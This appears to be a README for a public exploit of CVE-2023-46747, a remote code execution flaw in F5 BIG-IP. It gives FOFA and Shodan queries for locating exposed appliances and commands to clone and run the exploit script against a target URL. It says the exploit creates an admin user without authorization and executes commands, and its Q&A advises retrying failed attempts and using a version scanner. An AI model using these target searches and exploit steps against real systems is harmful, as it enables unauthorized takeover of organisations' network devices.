# Vulnerability details
1. fofa：`title="BIG-IP®- Redirect"`; shodan: `title:"BIG-IP®- Redirect"`
2. Affected versions: https://my.f5.com/manage/s/article/K000137353
# Vulnerability recurrence
1. At this time, the user here is only `admin`:
2. Execute the script:
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890
Successfully executed command:
3. A new user was successfully created without authorization here:
# Q & A
1. Q: Token acquisition failed?
A: It cannot be said that there must be no vulnerability in the test site, because creating a user without authorization is not 100% successful. Sometimes you do not create a user in the first step due to some reasons, so the token in the second step cannot be obtained. Therefore, my suggestion is to try a few more times. If it does not work, it may mean that there is indeed no vulnerability.
You can use this script https://github.com/BishopFox/bigip-scanner to collect F5 BIG-IP version information. It's great!